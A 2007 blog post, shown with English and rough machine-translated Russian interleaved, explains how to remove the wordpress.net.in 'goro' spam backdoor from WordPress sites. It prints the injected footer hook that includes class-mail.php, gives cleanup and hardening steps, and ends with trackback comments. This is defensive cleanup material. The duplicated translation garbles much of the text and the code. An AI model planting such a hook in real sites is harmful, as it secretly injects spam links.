• November 30th, 2007 30 ноября 2007 года

      How to Remove Wordpress.net.in Spam Injection How to Remove Wordpress.net.in Spam Injection Как удалить спам Wordpress.net.in инъекций Как удалить спам Wordpress.net.in инъекций

      wordpress-blackhat-seo-spam.png изображение chaoskaizer I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in). Я счел это время просмотра WordPress форум поддержки, некоторые из этих жертв обновить свои default_filters.php и загружать класс-mail.php внутри их WordPress, не зная, что это черный ход (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php . Существует не класс-mail.php в WordPress, за исключением класса phpmailer.php. So don’t get confuse by it. Так что не получают ее в заблуждение.

      Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes. Ниже приведен быстрый обход о том, каким образом вы можете удалить нарушителя Горо spamware раствор для инъекций, прежде чем Google запретил вам из интернета труб.

      Workaround Обход

      • For temporary disable remote include in php.ini settings. Для временного отключения удаленного включить в php.ini настройки.
         ;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;;  ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;;; Обертки и fopen; ;;;;;;;;;;;;;;;;;;; ли разрешить обращение с URL-адресов (например, http:// и ftp://) в виде файлов. allow_url_fopen = off allow_url_include = off allow_url_fopen = = allow_url_include покинуть покинуть 
      • Check your .htaccess for suspicious redirect. Проверьте ваш. Htaccess подозрительное переадресации.
      • Find class-mail.php inside “*/wp-includes/” directory and removed it. Найти класс-mail.php внутри "* / wp-включает /" директорию и удалить его.
      • Find the following code inside “*/wp-includes/default_filters.php” and removed it Найдите следующий код внутри "* / wp-includes/default_filters.php" и удалили его
         add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i  ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( 'wp_footer', 'wpc7c16b8466d864eeefd20050625c7775'); функция wpc7c16 <> b8466d864eeefd20050625c7775 () (@ включать ( '. / wp-включает / класс-mail.php'); если (sizeof ($ wparr)> 0) (эхо " ! div идентификатор = \ "Горо \"! "; foreach ($ wparr как к $ => $ в) (эхо" ". ucwords ($ в [ 'ключ'])." \ n"; если (я $     = = $ inum) перерыва;) эхо "! / div !".$_ колонтитул;)) 
      • Robots.txt Exclusion Исключение Robots.txt

        Optional - Prevent googlebot from indexing the static spam page. Необязательно - Запрет на google-бот индексировать спам статические страницы.
        Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Войти на Wordpress администратора> Управление> Files> Другие файлы → введите "Robots.txt". Add the following code. Добавьте следующий код.

         User-agent: Googlebot Disallow: /*?* Disallow: /*? User-Агент: робот Google Disallow: / * *? Disallow: / *? 

        Refer robots.txt . Обратитесь robots.txt.

      Possible WordPress class (suspicious) files that would be tempered Возможные WordPress класса (подозрительных) файлов, которые будут закаленное

      Md5 checksum the following files, compare it with official versions from WordPress Release Archive . Контрольная сумма MD5 следующие файлы, сравните ее с официальной версии из WordPress-релиз Архив.

      The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Выше методов только удалять и инвалидов спамов связей, нет никакой гарантии, что он будет защищен от вас будущих уязвимости. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade . Резервное копирование (или экспортировать эту должность с использованием WordPress Расширенная RSS-WRX) и выполнять полное обновление.

      Dec 13, 2007 13 декабря 2007 года

      I just notice this recently. Я просто заметить это в последнее время. You’ll need to check your site HTTP Header. Вам нужно будет проверить ваш сайт HTTP-заголовка. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) . Большинство угнанных сайты не ответ с правильной статуса HTTP Header (400 <> 500). My guess is they did this to cloak from being crawl by search engine spiders. Моя догадаться, что они делали это для прикрытия от сканирование, "паукам" поисковых систем. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner . Если вы были очищены все зараженные файлы и заголовок не правильно получить ответ rookit сканер.

      Check your website status header, try cloak your browser (UA) as Search Engine Crawler. Проверьте свой веб-сайт статуса заголовка, попробуйте плащ браузера (UA), как поисковая система сканера. The following screenshot will show you how to setup this at web-sniffer.net. Следующий скриншот покажу вам, как настроить на этом веб-sniffer.net.

      изменении пользовательского агента строк, как google-бот

      This methods may not work if the cloaking scripts used IP base tracking. Данный метод может не сработать, если используются скрипты клоакинг IP база слежения. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). Так что попробовать на разные строки агента пользователя (например: inoktomi, askjeeves, ia_archiver).

      Firefox Browser Браузер Firefox

      You can also override your useragent string with firefox ↓. Вы можете также отменит ваши UserAgent эти строки, firefox ↓.

      about:config → general.useragent.overide = ‘ ua strings о: конфигурации → general.useragent.overide = 'укр строки "

      Wordpress.net.in Backdoor Wordpress.net.in Backdoor

      Extra info Дополнительная информация

      Wordpress.net.in Doorway Дверная Wordpress.net.in

      Dec 24, 2007http://www.wordpress.net.in/mentors/alxumuk/ 24 декабря 2007 http://www.wordpress.net.in/mentors/alxumuk/

      Backdoor Files Backdoor Файлы

      inside wp-includes directory. внутри wp-включает в себя каталог.

      • compat.php - (replace with latest version) compat.php - (заменить поздняя версия)
      • class-mail.php delete класс-mail.php удалить

      scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins . сканирование и удаляет все файлы бэкдор и создавать. htaccess файл в wp-включает в себя и wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index). Затем добавить следующий код для инвалидов листинг каталога (предотвращение утечки информации и поиска в каталоге индекса).

       Options -Indexes Опции индексов 

      Wordpress.net.in New Partner Wordpress.net.in нового партнера

      Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 23 февраля 2008 года, мы обнаружили, как и аналогичные подписи wordpress.net.in на qwetro.com (Германия). Probably from the same attacker with different agenda. Наверное, с того же атакующего с разными дня.

      Short URL Краткий URL

      Bookmarks Закладки

16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16 Ответы на "Как удалить спам Wordpress.net.in Injection"

    • Kako odstraniš спам Линке на blogu - afroarticles.com | было фото had.si had.si
    • RE: How to Remove Wordpress.net.in Spam Injection RE: Как удалить спам Wordpress.net.in инъекций
      5 months ago on December 13th, 2007 at 6:21 pm 3 url · microId 5 месяцев назад, 13 декабря 2007 года в 6:21 вечера 3 url microId
      1 1

      [...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [...] Enak на проблему, о vendar? Itno jih є zelo мало rešilo все skupaj. Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] Google Ampak дела? Udeže: Как удалено Wordpress.net.in Спам Injection инфицированных "Горо" Спам класс-mail.php Backdoor В rešitev є [...]

    • "Синтаксическая ошибка. равно не формируется" «whateverblog". фотография jcheng.wordpress.com jcheng.wordpress.com
    • RE: How to Remove Wordpress.net.in Spam Injection RE: Как удалить спам Wordpress.net.in инъекций
      4 months ago on January 8th, 2008 at 11:14 am 3 url · microId 4 месяца назад, 8 января 2008 года в 11:14 утра 3 url microId
      4 4

      [...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Это то, что Гордон Dewis Обнаружен: поиск в Google wordpress.net.in показало, число страниц, в том числе запись в блоге Avice De'vereux, что описанные симптомы и заявили, что они были вызваны спамом путем инъекций угона [.. .]

    • Де Smeetsjes - »Уик-энд woei…" фотография desmeetsjes.nl desmeetsjes.nl
    • RE: How to Remove Wordpress.net.in Spam Injection RE: Как удалить спам Wordpress.net.in инъекций
      2 months, 3 weeks ago on February 16th, 2008 at 8:48 am 3 url · microId 2 месяца, 3 недели назад, 16 февраля 2008 года в 8:48 утра 3 url microId
      6 6

      [...] en is alle gehackte code gevonden. [...] В это предлагает gehackte код gevonden. Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. Mocht є последние hebben ван де div идентификатор = "Горо" взломать kijk дан здесь eens voor handige советы voor het verwijderen. Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...] Alhoewel ик voorlopig geen PC klusjes Зу doen gaan мы toch [...]